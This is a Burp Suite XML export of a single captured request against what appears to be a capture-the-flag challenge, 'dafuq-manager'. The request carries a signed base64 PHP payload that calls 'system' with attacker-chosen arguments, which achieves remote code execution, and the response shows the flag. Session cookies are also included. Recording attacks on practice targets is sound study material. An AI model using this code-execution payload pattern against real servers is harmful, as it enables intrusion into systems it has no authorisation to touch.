<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Wed Nov 28 11:49:36 CST 2018">
  <item>
    <time>Wed Nov 28 11:48:07 CST 2018</time>
    <url><![CDATA[https://dafuq-manager.hackme.inndy.tw/index.php?action=debug&dir[]=test&command=JF9HRVRbImYiXSgkX0dFVFsiYyJdKTs=.22797e3a4f76c97aea99903126f1bf001f79f42c22126bf5356746d99ceeafd2&f=system&c=flag3/meow%20flag3/flag3]]></url>
    <host ip="140.118.126.236">dafuq-manager.hackme.inndy.tw</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/index.php?action=debug&dir[]=test&command=JF9HRVRbImYiXSgkX0dFVFsiYyJdKTs=.22797e3a4f76c97aea99903126f1bf001f79f42c22126bf5356746d99ceeafd2&f=system&c=flag3/meow%20flag3/flag3]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /index.php?action=debug&dir[]=test&command=JF9HRVRbImYiXSgkX0dFVFsiYyJdKTs=.22797e3a4f76c97aea99903126f1bf001f79f42c22126bf5356746d99ceeafd2&f=system&c=flag3/meow%20flag3/flag3 HTTP/1.1
Host: dafuq-manager.hackme.inndy.tw
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _ga=GA1.2.76306216.1543299544; _gid=GA1.2.1868987640.1543299544; session_guard=7s2q6jedh8mqo6f2nvr94set0n; PHPSESSID=1m8c1gkhv4gu5nsruvtlsolj91

]]></request>
    <status>200</status>
    <responselength>377</responselength>
    <mimetype>CSS</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx
Date: Wed, 28 Nov 2018 03:48:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=15768000
Content-Length: 72

FLAG{Oh, Looks like you have a shell. Please don't fuck up the system.}
]]></response>
    <comment></comment>
  </item>
</items>
